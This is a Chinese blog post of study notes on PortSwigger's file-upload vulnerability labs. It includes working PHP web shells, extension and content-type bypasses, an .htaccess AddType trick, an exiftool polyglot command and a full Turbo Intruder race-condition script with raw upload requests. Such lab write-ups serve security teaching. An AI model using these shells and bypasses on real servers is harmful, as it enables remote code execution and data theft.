111人参与 • 2024-08-04 • 企业安全
该文章是作者在portswigger的文件上传漏洞靶场训练的过程记录以及学习笔记 使用的工具为burpsuite pro
文件上传漏洞通常指应用对用户上传的文件没有完善的检验,允许攻击者通过web应用程序上传恶意文件到服务器,然后通过这些恶意文件来进行执行任意代码,在客户端影响用户等攻击
lab地址:remote code execution via web shell upload
<?php echo file_get_contents('/home/carlos/secret'); ?>
该lab没有任何的防御措施,直接上传php脚本即可,访问拿到密钥通过
lab地址:web shell upload via content-type restriction bypass
某些情景下,web应用可能通过请求中content-type字段判断上传文件的类型,这种时候我们可以上传脚本,抓包,修改content-type来绕过限制
该lab直接上传脚本会被拦截 修改content-type的值为image/jpeg,成功上传
lab地址:web shell upload via path traversal
某些情景下,web应用会对存放用户上传文件的文件夹做限制,可能不给执行文件的权限,这种情况下,可以尝试通过路径遍历的方式上传文件到其他文件夹
打开lab,尝试通过路径遍历上传文件,发现路径遍历序列(../
)被过滤了 尝试对路径遍历序列进行url编码,发现上传成功
读取上传的文件,注意路径是上一级目录
lab地址:web shell upload via extension blacklist bypass
某些情景下,web应用对用户上传的文件的扩展名做了限制,但是使用的是黑名单机制,这种情况下,我们可以尝试用以下几种方式进行绕过
php5,pht,phpt,phtml,php3,php4,php5,php6
.php
.htaccess
或者iis的web.config
example.php.jpg
,这种方式依赖于服务器如何解析文件,如果服务器从前往后解析,并且解析到第一个扩展名就停止解析 ,则该文件会被当作example.php
存储example.php.
或example.php
(末尾有一个空格)example%2ephp
example.php;jpg
或example.php%00.jpg
xc0 xae
,xc4 xae
,xc0 x2e
再utf-8编码下可能转化为x2e
,然后转化为ascii字符使用该lab使用的是apache的web容器,不解析php5后缀的文件,我们可以分两步走,第一次先上传.htaccess文件,文件内容如下
addtype application/x-httpd-php .php5
第二次再上传php5文件,然后访问拿到密钥字符串
lab地址:web shell upload via obfuscated file extension
该lab的目的还是对黑名单的绕过,使用多扩展名和空字符隔断来达成目的
lab地址:remote code execution via polyglot web shell upload
某些情景下,web应用会对上传文件的内容做校验,如果没有识别到预期的特征码,则会报错。譬如jepg文件以字节ff d8 ff
开头,如果web应用没有在文件开头检测到ff d8 ff
,则不予通过。这种情况下,可以通过exiftool或其他工具来修改文件元数据,插入脚本生成多态jpeg文件进行绕过 exiftool命令:
exiftool -comment="<?php echo 'start ' . file_get_contents('/home/carlos/secret') . ' end'; ?>" <your-input-image>.jpg -o polyglot.php
lab地址:web shell upload via race condition
某些情景下,web应用会先将文件存放在文件夹, 然后对文件进行检验,如果检验不通过,则删除文件。 这种情况下,检验文件需要花费时间,可以尝试通过条件竞争(也就是并发请求)来访问上传的文件
通过该lab的过程使用了burpsuite的turbo intruder插件,可以从插件商店获取 思路如下:先上传脚本文件,然后并发请求脚本文件 将上传文件的post请求发送到turbo intruder中 运行脚本,得到的返回结果中有一个状态码200的响应
turbo intruder脚本如下: request1就是上传脚本的post请求,request2就是访问脚本的get请求
def queuerequests(target, wordlists):
# 创建一个请求引擎实例,设置目标端点和并发连接数为10
engine = requestengine(endpoint=target.endpoint, concurrentconnections=10,)
# 定义第一个请求,发送一个包含php shell代码的post请求
request1 = '''post /my-account/avatar http/2
host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
cookie: session=ytriml41vqc9ht9zuultsg0n3hvhyv1k
content-length: 474
cache-control: max-age=0
sec-ch-ua: "not/a)brand";v="8", "chromium";v="126", "google chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "windows"
upgrade-insecure-requests: 1
origin: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
content-type: multipart/form-data; boundary=----webkitformboundary5enuwu47mkxzu1bo
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/126.0.0.0 safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account?id=wiener
accept-encoding: gzip, deflate, br
accept-language: zh-cn,zh;q=0.9
priority: u=0, i
------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="avatar"; filename="shell.php"
content-type: application/octet-stream
<?php echo file_get_contents('/home/carlos/secret'); ?>
------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="user"
wiener
------webkitformboundary5enuwu47mkxzu1bo
content-disposition: form-data; name="csrf"
zrwxp2w3zbeprteru2qzyfpvsmtao8vl
------webkitformboundary5enuwu47mkxzu1bo--
'''
# 定义第二个请求,发送一个get请求来访问上传的php shell文件
request2 = '''get /files/avatars/shell.php http/2
host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
cookie: session=ytriml41vqc9ht9zuultsg0n3hvhyv1k
sec-ch-ua: "not/a)brand";v="8", "chromium";v="126", "google chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "windows"
upgrade-insecure-requests: 1
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/126.0.0.0 safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account/avatar
accept-encoding: gzip, deflate, br
accept-language: zh-cn,zh;q=0.9
priority: u=0, i
'''
# 使用 'race1' 标签将第一个请求排队,并阻止该请求的最后一个字节直到调用 opengate
engine.queue(request1, gate='race1')
# 将第二个请求排队5次,使用相同的 'race1' 标签
for x in range(5):
engine.queue(request2, gate='race1')
# 等待所有带有 'race1' 标签的请求准备就绪
# 然后发送每个请求的最后一个字节
# (此方法是非阻塞的,就像 queue 方法一样)
engine.opengate('race1')
# 完成所有请求,设置超时时间为60秒
engine.complete(timeout=60)
def handleresponse(req, interesting):
table.add(req)
上传包含javascript代码或内联javascript的脚本文件,如果在其它页面被用户访问,就可以造成xss漏洞
如果系统正确,安全的对上传文件进行处理和存储,可以尝试在解析文件过程中测试漏洞,例如解析microsoft office的docx文件,xls文件等类型的文件,可能会有xxe漏洞的风险
防止文件上传漏洞的产生需要一套组合拳,组合如下:
../
)的字符串您想发表意见!!点此发布评论
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论